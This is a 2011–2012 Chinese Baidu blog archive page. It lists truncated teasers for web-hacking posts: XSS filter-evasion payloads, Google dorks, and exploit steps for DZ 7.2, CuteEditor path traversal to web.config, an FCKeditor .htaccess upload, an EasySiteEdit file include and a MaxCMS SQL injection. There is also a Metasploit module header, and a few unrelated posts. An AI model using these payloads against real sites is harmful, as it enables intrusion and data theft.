文章列表
 
您正在查看 "Web" 分类下的文章

2012-03-22 0:06

 改变编码中0的数量 (\0X -> \00000X)。

例如:<p style=”xss:\65xpression(alert(/wpulog/))”>
<p style=”xss:\065xpression(alert(/wpulog/))”>
<p style=”xss:\0065xpression(alert(/wpulog/))”>
效果是一样的。
 
改变编码字符的大小写(\0A -> \0a)。
例如:<p style=”xss:expression(alert(/wpulog/))\x0d”>
<p style=”xss:expression(a
 
2012-02-26 22:45

网上好多这样的文章我的只不过是来个小总结,恩其实光是总结还不够,因为我写的还不是很全面。
其实搜索这些漏洞我们必须要先连接关于搜索引擎的一些语法下面给大家介绍一下:

inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用.
intext: 只搜索网页<body>部分中包含的文字(也就是忽略了标题,URL等的文字).
site: 可以限制你搜索范围的域名.
filetype: 搜索文件的后缀或者扩展名
intitle: 限制你搜索的网页标题.

 
2012-02-26 22:16

网站访问速度问题其实应该居于站长应该考虑的最优先的问题,网站访问慢直接关系到网站访问量,用户体验度的问题。今天我就来给大家介绍几种通用的解决网站太慢的方法。

  1.通过浏览器插件找出网页请求过程中的加载时间问题

  这里推荐使用火狐的Firefbug或者谷歌浏览器的开发人员工具(F12),这里以firebug为例,装好firebug后,在打开firebug的情况下,刷新你的网站页面,如图:

  

   

 
2012-02-26 21:58

 感觉时间真的过得真的很快,电脑一开一关一天就没了。不能这样下去,所以我打算抽出点时间来写博客和学习,记录一下自己的成长。

 
不管是程序员、还是安全工程师,读别人的代码无疑都是进步较快的方式,所以我觉得从今天起抽出时间来把站长网上的开源cms都看一遍,学习学习。
 
    看到一套DirCms就把他下回来了,名字还蛮特别的(ps:小心我dir溢出你)。
 
    貌似黑帽子们
 
2012-01-01 0:18
SGDID:No.041101
作者:YoCo Smart
来自:Silic Group Hacker Army
导言:

正文分两部分,第一部分是我还没拿到土耳其朋友给的脚本之前,我所了解到的一些信息和分析,第二部分是核心部分,我不想多讲,我只贴注入代码,更详细的分析,我觉得没必要。为什么呢,大牛们看了代码就知道了,就是一个把挂马代码直接植入到数据库的注入代

 
2011-11-23 21:19

Team:t00ls Author: Cond0r

if($_REQUEST){

if(get_magic_quotes_gpc()){

$_REQUEST = tao_strip($_REQUEST);

}else{

$_POST = tao_check($_POST);

$_GET = tao_check($_GET);

@extract($_POST);

@extract($_GET);

}

$_REQUEST=filter_xss($_REQUEST, ALLOWED_HTMLTAGS);

@extract($_REQUEST);

只做了简单的简单的过滤

漏洞文件

shops.php

$cid = addslashes($_GET['ci

 
2011-09-24 9:12
这里只是说下方法,在要爆DZ 7.2 bbs的网站后面加上以下代码访问,即可爆出。
"manyou/admincp.php?my_suffix=%0A%0DTOBY57",引号不算。
例如:
http://team.dis9.com/manyou/admincp.php?my_suffix=%0A%0DTOBY57
效果图如下:
 
2011-09-15 17:13

受影响版本 eWebEditor 2.8 免费版

   这两天没什么事情闲着无聊就打开了许久不用的WEB漏洞扫描工具对外的打某高校进行了注入漏洞检查!发现漏洞以后发现两所学校打网址是一个公司做的就开始了渗透....

   首先进入打是一个同服务器打分站后台!进入以后发现不能上传网页文件且编辑器傻用eWebEditor 2.8 打免费版本试了下默认密码ADMIN  AMIN888密码不正确准备想别打办法打时候误操作把账号蓝打入了密码,已经打进去了就别改了抱着试试看打态度把密码栏还傻打上ADMIN888没想到进去了,,

 
2011-09-15 17:11

标题: webadmin <= Shell Upload Vulnerability (MSF)
作者: Caddy-Dz

下载地址: http://wacker-welt.de/webadmin/webadmin.php.gz
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
    Rank = GreatRanking
 
    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Remote::HttpClient
 
    def initiali

 
2011-08-29 19:35

/**************************Mssql***********************/
<!–#include file=”conn.asp”–>
<%
hid=request.QueryString(“id”)
sql=”select * from admin where id=”&hid
set rs=conn.execute (sql)
%>

/**************************Access***********************/
<%
db=”aspzhuru.mdb”‘这里修改数据库路径或名称
Set conn = Server.CreateObject(“ADODB.Connection”)
dbpath=”Provider=Microsoft.Jet.OLEDB.4.0;Data Source=” & Server.MapPath(

 
2011-08-27 17:45

EasySiteEdit远程文件包含缺陷及修复

Exploit Title: EasySiteEdit remote file include
作者:koskesh jakesh
下载地址: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip
# Tested on: linux
-------------------------------
vul:sublink.php
line 20:
include($_REQUEST['langval']);
-------------------------------
测试:
http://www.xxx.cn

 
2011-08-27 17:44

方法1.直接下载load.ashx配置文件

http://www.badguest.cn /CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config

然后查看一些sql配置信息 从sql数据库连接入手

<connectionStrings>

<add name=”ynncConnectionString” connectionString=”Server=.;DataBase=ynta; UID=sa;PWD=”/>

<add name=”strConn” connectionString=”Server=.;DataBase=ynta; UID=sa;PWD=”/>

</connectionString

 
2011-08-27 17:44

漏洞文件:admin/admin_inc.asp

代码如下:

Sub checkPower   //第103行
        dim loginValidate,rsObj : loginValidate = "maxcms2.0"
        err.clear
        on error resume next
        set rsObj=conn.db("select m_random,m_level from {pre}manager where m_username=''"&rCookie("m_username")&"''","execute")

 
2011-08-27 17:42

FCKeditor all versian Arbitrary File Upload Vulnerability
发布时间: 2011
源码地址:http://sourceforge.net/projects/fckeditor/
漏洞作者: pentesters.ir
利用步骤:
1.创建一个htaccess文件:
代码内容:
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>

2.实用编辑器上传htaccess文件.

http://www.xxx.cn/FCKeditor/editor/filemanager/upload/test.htm

 
2011-07-20 12:14

作者:kashifs

最短的跨站语句是多少?要放在以前,我一定会这样想,正常的跨站代码:<script>alert ("a")</script> ,查一下,一共27个字符。嘿嘿,不过,这之前我在《安全手册》上看到了他的一篇文章,《疯狂的跨站之行》,在这其中提到了跨站语句的另一种方法:
以下是代码片段:
<script>z='document.'</script>

 
   
 
 
文章存档
 
     
 
最新文章评论
  

09的事情
 

[表情]
 

搞了大一堆,最终没有说怎么用的,怎么开始的,晕!~
 

,经典!受用了!
 

意义不大.C#程序员不会傻到写程序的时候给你加上unsafe.况且unsafe不是经验老道的程
   
帮助中心 | 空间客服 | 投诉中心 | 空间协议
©2012 Baidu